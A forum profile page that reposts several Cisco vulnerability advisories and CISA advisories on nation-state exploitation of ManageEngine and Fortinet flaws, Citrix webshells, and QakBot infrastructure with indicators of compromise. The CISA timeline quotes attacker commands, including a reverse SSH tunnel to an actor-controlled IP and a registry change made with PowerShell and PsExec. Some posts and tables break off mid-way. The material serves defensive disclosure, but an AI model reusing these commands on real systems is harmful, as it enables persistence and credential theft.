Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Topics - Netwörkheäd

#1
Cisco Identity Services Engine RADIUS Denial of Service Vulnerability

A vulnerability in the RADIUS message processing feature of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause the affected system to stop processing RADIUS packets.


This vulnerability is due to improper handling of certain RADIUS accounting requests. An attacker could exploit this vulnerability by sending a crafted authentication request to a network access device (NAD) that uses Cisco ISE for authentication, authorization, and accounting (AAA). This would eventually result in the NAD sending a RADIUS accounting request packet to Cisco ISE. An attacker could also exploit this vulnerability by sending a crafted RADIUS accounting request packet to Cisco ISE directly if the RADIUS shared secret is known. A successful exploit could allow the attacker to cause the RADIUS process to unexpectedly restart, resulting in authentication or authorization timeouts and denying legitimate users access to the network or service. Clients already authenticated to the network would not be affected.


Note: To recover the ability to process RADIUS packets, a manual restart of the affected Policy Service Node (PSN) may be required. For more information, see the Details section of this advisory.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-radius-dos-W7cNn7gt



     
         
Security Impact Rating:  High
   
   
       
CVE: CVE-2023-20243
Source: Cisco Identity Services Engine RADIUS Denial of Service Vulnerability
#2
Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475

[html]

SUMMARY


The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited https://nvd.nist.gov/vuln/detail/CVE-2022-47966" title="CVE-2022-47966">CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting https://nvd.nist.gov/vuln/detail/CVE-2022-42475" title="CVE-2022-42475">CVE-2022-42475 to establish presence on the organization's firewall device.


CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.


Download the PDF version of this report:






   

    https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf" class="c-file__link" target="_blank">AA23-250A Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475
    (PDF,       685.14 KB
  )

 


For a downloadable copy of IOCs, see:






   

    https://www.cisa.gov/sites/default/files/2023-09/AA23-250A.stix_.xml" class="c-file__link" target="_blank">AA23-250A STIX XML
    (XML,       69.24 KB
  )

 






For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see:






   

    https://www.cisa.gov/sites/default/files/2023-09/MAR-10430311.c1.v1.CLEAR_.pdf" class="c-file__link" target="_blank">MAR-10430311-1.v1 Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475
    (PDF,       385.49 KB
  )

 


Note: This advisory uses the https://attack.mitre.org/versions/v13/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors' activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.


Overview


By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization's network via at least two initial access vectors:


  • Initial Access Vector 1: APT actors exploited CVE-2022-47966 to access the organization's web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus.

  • Initial Access Vector 2: APT actors exploited CVE-2022-42475 to access the organization's firewall device.

CISA and co-sealers identified an array of threat actor activity, to include overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewall, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand targeted network access, serve as malicious infrastructure, or a mixture of both.


APT Actor Activity


Initial Access Vector 1

As early as January 2023, APT actors exploited CVE-2022-47966 [https://attack.mitre.org/versions/v13/techniques/T1190/" title="Exploit Public-Facing Application">T1190] for initial access to the organization's web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153 was made as part of initial exploitation.


Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [https://attack.mitre.org/versions/v13/techniques/T1136/001/" title="Create Account: Local Account">T1136.001] named Azure with administrative privileges [https://attack.mitre.org/versions/v13/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization's network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.


Initial Access Vector 2

Additional APT actors exploited CVE-2022-42475 on the organization's firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [https://attack.mitre.org/versions/v13/techniques/T1078/003/" title="Valid Accounts: Local Accounts">T1078.003] from a previously hired contractor—of which the organization confirmed the user had been disabled prior to the observed activity.


Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [https://attack.mitre.org/versions/v13/techniques/T1070/001/" title="Indicator Removal: Clear Windows Event Logs">T1070.001]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled.


APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [https://attack.mitre.org/versions/v13/techniques/T1573/002/">T1573.002] on Transmission Control Protocol (TCP) port 10443 [https://attack.mitre.org/versions/v13/techniques/T1571/">T1571], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:


  • 144.202.2[.]71

  • 207.246.105[.]240

  • 45.77.121[.]232

  • 47.90.240[.]218

APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis.


  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\resource.aspx

  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\discover.ashx

  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\configlogin.ashx

  • c:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\template\layouts\approveinfo.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\errorinfo.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.ashx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\error.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\infos.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info-1.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\new_list.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\errorinfo.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\lgnbotr.ashx

  • c:\inetpub\passwordchange\0LECPNJYRH.aspx

  • c:\inetpub\passwordchange\9ehj.aspx

  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\servicesinfo.ashx

  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\services.aspx

  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1fw.aspx

  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1ew.aspx

The following IP addresses were identified as associated with the loaded web shells:


  • 45.90.123[.]194

  • 154.6.91[.]26

  • 154.6.93[.]22

  • 154.6.93[.]5

  • 154.6.93[.]12

  • 154.6.93[.]32

  • 154.6.93[.]24

  • 184.170.241[.]27

  • 191.96.106[.]40

  • 102.129.145[.]232

Forensic Timeline of APT Actor Activity

Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).














































































Table 1: Timeline of APT Actor Activity

Timestamp (UTC)



Event



Description



2023-01-18


11:57:02



Hello World User-Agent string observed in 44 total events.


Uniform Resource Identifier (URI): /cgi-bin/downloadFlile[.]cgi



Hello World, the User-Agent string inside of the initiated HTTP request, was observed during communication between the organization's web server and malicious command and control (C2) server IP 92.118.39[.]82 [https://attack.mitre.org/versions/v13/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001]. This string has been observed in open source as an initial step of the Mirai botnet to download malicious artifacts [https://attack.mitre.org/versions/v13/techniques/T1583/005/" title="Acquire Infrastructure: Botnet">T1583.005].[https://snort.org/rule_docs/1-58992" title="SID 1:58992">1]



2023-01-20



Attempts made to export three files; associated with malicious IP 192.142.226[.]153.



APT actors attempted to export [https://attack.mitre.org/versions/v13/tactics/TA0009/" title="Collection">TA0009], [https://attack.mitre.org/versions/v13/tactics/TA0010/" title="Exfiltration">TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with .zip and .gif extensions to evade detection [https://attack.mitre.org/versions/v13/techniques/T1036/008/" title="Masquerading: Masquerade File Type">T1036.008]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files:


  • wo_view_bg.zip (09:06:37 UTC)\

  • wo_view_bg1.gif (09:08:11 UTC)

  • wo_view_bg2.gif (09:19:43 UTC)

Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1.



2023-01-20


16:51:05



Successful web server exploitation via CVE-2022-47966.



Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966.



2023-01-21


06:46:42



Azure local user account with administrative permissions created.



A local user account with administrative permissions, named Azure, was created on the server hosting ServiceDesk Plus.



2023-01-21


06:49:40



LSASS dumped by Azure user.



The Azure user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [https://attack.mitre.org/versions/v13/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001].


Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.



2023-01-21


06:50:59



Mimikatz.exe downloaded via ConnectWise ScreenConnect.



The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download mimikatz.exe, and execute malicious payloads to steal credentials [https://attack.mitre.org/versions/v13/techniques/T1219/" title="Remote Access Software">T1219], [https://attack.mitre.org/versions/v13/techniques/T1588/002/" title="Obtain Capabilities: Tool">T1588.002].


Note: ConnectWise ScreenConnect was observed in multiple locations within the organization's environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of mimikatz.exe.



2023-01-21


07:34:32



Bitmap.exe malware downloaded and designated to connect to C2 IP 179.60.147[.]4.



Azure user account downloaded bitmap.exe to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [https://attack.mitre.org/versions/v13/techniques/T1027/009/" title="Obfuscated Files or Information: Embedded Payloads">T1027.009]. This malware is identified as a variant of Metasploit (Meterpreter).


See MAR-10430311-1.v1 for additional details.



2023-01-21


08:46:23



Mimikatz credential dump files created.



Two files (c:\windows\system32\fuu.txt, c:\windows\system32\jojo.txt) were created as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [https://attack.mitre.org/versions/v13/techniques/T1003/" title="OS Credential Dumping">T1003].



2023-01-21


09:25:58



Legitimate files/applications nmap.exe and npcap.exe downloaded.



Azure user account downloaded nmap.exe [https://attack.mitre.org/versions/v13/techniques/T1018/" title="Remote System Discovery">T1018] and npcap.exe [https://attack.mitre.org/versions/v13/techniques/T1040/" title="Network Sniffing">T1040] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes.


Note: Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.



2023-01-21


13:56:14



ssh2.zip downloaded by the Azure user account.



APT actors downloaded the file ssh2.zip via the Azure user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted:


  • install-sshd.ps1 (script)

  • psexec.exe

  • sshd.exe

  • ssh.exe

  • ssh-sk-helper.exe

  • libcrypto.dll

Note: CISA analyzed these files and did not identify the files as malicious. However, ssh.exe was downloaded to establish persistence on the ServiceDesk system via SSH [https://attack.mitre.org/versions/v13/techniques/T1133/" title="External Remote Services">T1133] and is detailed in the scheduled task below.



2023-01-21


14:31:01



SSH tools downloaded to establish reverse (remote) communication.



Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations:


  • c:\windows\system32\ssh-shellhost.exe

  • c:\windows\system32\ssh-agent.exe

  • c:\windows\system32\ssh-add.exe

While the files were not identified as malicious, they were loaded for malicious purposes.



2023-01-21


14:33:11



license validf scheduled task created to communicate with malicious IP 104.238.234[.]145.



license validf scheduled task [https://attack.mitre.org/versions/v13/techniques/T1036/004/" title="Masquerading: Masquerade Task or Service">T1036.004] was created to execute ssh.exe on a recurring basis on the ServiceDesk system [https://attack.mitre.org/versions/v13/techniques/T1053/005/" title="Scheduled Task/Job: Scheduled Task">T1053.005]:


c:\Windows\System32\ssh.exe -N -f -R 12100 sst@104.238.234.145 -p 443 -o StrictHostKeyChecking=no



2023-01-21


14:51:49



PsExec executed on the ServiceDesk system.



Analysis identified evidence and execution of two files (PsExec.exe and psexec.exe) on the ServiceDesk system. These files were determined to be benign.


APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine.


psexec.exe -i -s C:\Windows\System32\mmc.exe /s C:\Windows\System32\taskschd.msc


powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force


Note: PsExec, a command line utility from Microsoft's Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed.



2023-01-21


14:55:02



ProcDump created on the ServiceDesk system.



ProcDump was created within the c:\windows\system32\prc64.exe directory. This was later identified as a method for enumerating running processes/applications [https://attack.mitre.org/versions/v13/techniques/T1057/" title="Process Discovery">T1057] and dumping LSASS credentials.



2023-01-21


14:02:45



Ngrok token created, renamed to ngrok.yml config file, and Remote Desktop Protocol (RDP) connection established.



Ngrok was used to establish an RDP connection [https://attack.mitre.org/versions/v13/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system.


At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Considering APT actors utilized an outbound proxy, the RDP session was successfully established as the connection was initiated from the ServiceDesk system.


Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.



2023-01-24


15:07:18



Apache Log4j exploit attempted against the ServiceDesk system.



APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are:


  • 80.85.241[.]15

  • 68.177.56[.]38

  • main.cloudfronts[.]net


2023-01-25


00:17:33



Mimikatz credential dump files created.



One file (c:\ManageEngine\ServiceDesk\bin\1.txt) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system.


Note: This is a different path and time associated with Mimikatz than listed above.



2023-01-29



HTTP-GET requests sent to C2 IP 92.118.39[.]82.



The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted.



2023-02-02


05:51:08



Resource.aspx web shell detected.



Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [https://attack.mitre.org/versions/v13/techniques/T1059/007/" title="Command and Scripting Interpreter: JavaScript">T1059.007] on the OWA server [https://attack.mitre.org/versions/v13/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003]:


  • c:\Program Files\Microsoft Office Web Apps\RootWebSite\en-us\resource.aspx

Note: The administrative user's credentials were obtained from the APT actors' collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created Azure user account.


See MAR-10430311-1.v1 for additional details.



2023-02-02


18:45:58



Metasploit service installed.



APT actors installed Metasploit with the following attributes on the organization's domain controller [https://attack.mitre.org/versions/v13/techniques/T1059/001/">T1059.001]:


Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code.



2023-02-03


03:27:59



ConfigLogin.aspx web shell detected.



APT actors dropped an additional ASPX web shell on a web server in the following file system location:


  • c:\inetpub\wwwrot\uninet\css\font-awesome\css\ConfigLogin.aspx

See MAR-10430311-1.v1 for additional details.



2023-02-03


15:12:23



wkHPd.exe created to communicate with malicious IP 108.62.118[.]160.



APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe [https://attack.mitre.org/versions/v13/techniques/T1587/001/" title="Develop Capabilities: Malware">T1587.001]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system.


See MAR-10430311-1.v1 for additional details.



2023-02-08


08:56:35,


2023-02-09


20:19:59,


2023-03-04,


2023-03-18



Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP 193.142.146[.]226.



PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk:


  • [REDACTED]/wp-content/themes/seotheme/db.php (12 instances)

  • [REDACTED]/wp-content/plugins/ioptimization/IOptimize.php (4 instances)


2023-03-06


06:49:40



Interact.sh



APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack [https://attack.mitre.org/versions/v13/techniques/T1046/">T1046].


Destination IP: 103.105.49[.]108


Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.
















Table 2: Observed Tools Used by APT Actors

Tool



Description



Observation



Mimikatz [https://attack.mitre.org/versions/v13/software/S0002/" title="Mimikatz">2]



A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.



In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files:


These files were dumped to obtain registry information such as users on the system, data used by the operating system [https://attack.mitre.org/versions/v13/techniques/T1012/" title="Query Registry">T1012], and installed programs.



Ngrok [https://attack.mitre.org/versions/v11/software/S0508/" title="Ngrok">3]



Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls.


In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-320a" title="Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester">4],[https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-294a" title="#StopRansomware: Daixin Team">5],[https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a" title="#StopRansomware: LockBit 3.0">6]



Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems [https://attack.mitre.org/versions/v13/techniques/T1572/" title="Protocol Tunneling">T1572].


Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok's ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors.



ProcDump



A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system.



APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus.



Metasploit



Metasploit is an open-source penetration testing software.


#3
Cisco HyperFlex HX Data Platform Open Redirect Vulnerability

A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to redirect a user to a malicious web page.


This vulnerability is due to improper input validation of the parameters in an HTTP request. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious website.



Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-redirect-UxLgqdUF


     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20263
Source: Cisco HyperFlex HX Data Platform Open Redirect Vulnerability
#4
Cisco BroadWorks Application Delivery Platform and Xtended Services Platform Authentication Bypass Vulnerability

A vulnerability in the single sign-on (SSO) implementation of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an unauthenticated, remote attacker to forge the credentials required to access an affected system.


This vulnerability is due to the method used to validate SSO tokens. An attacker could exploit this vulnerability by authenticating to the application with forged credentials. A successful exploit could allow the attacker to commit toll fraud or to execute commands at the privilege level of the forged account. If that account is an Administrator account, the attacker would have the ability to view confidential information, modify customer settings, or modify settings for other users. To exploit this vulnerability, the attacker would need a valid user ID that is associated with an affected Cisco BroadWorks system.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bw-auth-bypass-kCggMWhX



     
         
Security Impact Rating:  Critical
   
   
       
CVE: CVE-2023-20238
Source: Cisco BroadWorks Application Delivery Platform and Xtended Services Platform Authentication Bypass Vulnerability
#5
Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells

[html]

SUMMARY


Update September 6, 2023:

This Cybersecurity Advisory has been updated with new tactics, techniques, and procedures (TTPs) as well as indicators of compromise (IOCs) received from an additional victim and trusted third parties.


Update End

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization's non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim's active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.


The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.


This advisory provides TTPs and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise. If potential compromise is detected, organizations should apply the incident response recommendations provided in this CSA. If no compromise is detected, organizations should immediately apply patches provided by Citrix.


Download the PDF version of this report:






   

    https://www.cisa.gov/sites/default/files/2023-09/aa23-201a_csa_threat_actors_exploiting_citrix-cve-2023-3519_to_implant_webshells.pdf" class="c-file__link" target="_blank">AA23-201A Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells
    (PDF,       565.45 KB
  )

 


Update September 6, 2023:

In August 2023, CISA received TTPs and IOCs from an additional victim and trusted third parties. This CSA has been updated with the TTPs and IOCs to assist administrators with detecting and responding to this activity.


For a downloadable list of IOCs, see the following XML and JSON files:






   

    https://www.cisa.gov/sites/default/files/2023-09/AA23-201A.stix_.xml" class="c-file__link" target="_blank">AA23-201A STIX XML
    (XML,       43.13 KB
  )

 






Update End

#6
Cisco Unified Communications Products Privilege Escalation Vulnerability

A vulnerability in Cisco Emergency Responder, Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), and Cisco Unity Connection could allow an authenticated, remote attacker to elevate privileges to root on an affected device.


This vulnerability exists because the application does not properly restrict the files that are being used for upgrades. An attacker could exploit this vulnerability by providing a crafted upgrade file. A successful exploit could allow the attacker to elevate privileges to root. To exploit this vulnerability, the attacker must have valid platform administrator credentials on an affected device.



Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-priv-esc-D8Bky5eg



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20266
Source: Cisco Unified Communications Products Privilege Escalation Vulnerability
#7
Identification and Disruption of QakBot Infrastructure

SUMMARY


The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.


CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.


Download the PDF version of this report:






   

    AA23-242A Identification and Disruption of QakBot Infrastructure
    (PDF,       570.50 KB
  )

 


For a downloadable copy of IOCs, see:






   

    AA23-242A STIX XML
    (XML,       51.62 KB
  )

 






   

    AA23-242A STIX JSON
    (JSON,       43.12 KB
  )

 


TECHNICAL DETAILS


Overview


QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant amount of computer intrusions, to include ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.


Since its initial inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, to include performing reconnaissance, engaging in lateral movement, gathering and exfiltrating data, and delivering other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials are often sold to further the goals of the threat actor who delivered QakBot.


QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.


QakBot Infrastructure


QakBot's modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike[1], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti[2], ProLock[3], Egregor[4], REvil[5], MegaCortex[6], Black Basta[7], Royal[8], and PwndLocker.


Historically, QakBot's C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.





    Figure 1: QakBot's Tiered C2 Servers

     
Figure 1: QakBot's Tiered C2 Servers

The first tier of C2 servers includes a subset of thousands of bots selected by QakBot administrators, which are promoted to Tier 1 "supernodes" by downloading an additional software module. These supernodes communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes have been identified in 63 countries, which were active that same month. Supernodes have been observed frequently changing, which assists QakBot in evading detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes to relay communications to the Tier 2 C2 servers, serving as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.


Indicators of Compromise


FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with OakBot infections:


  1. QakBot sets up persistence via the Registry Run Key as needed. It will delete this key when running and set it back up before computer restart: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

  2. QakBot will also write its binary back to disk to maintain persistence in the following folder: C:\Users\\AppData\Roaming\Microsoft\\

  3. QakBot will write an encrypted registry configuration detailing information about the bot to the following registry key: HKEY_CURRENT_USER\Software\Microsoft\

In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.


Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these observed IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.

























































































Table 1: IPs Affiliated with QakBot Infections

IP Address



First Seen



85.14.243[.]111



April 2020



51.38.62[.]181



April 2021



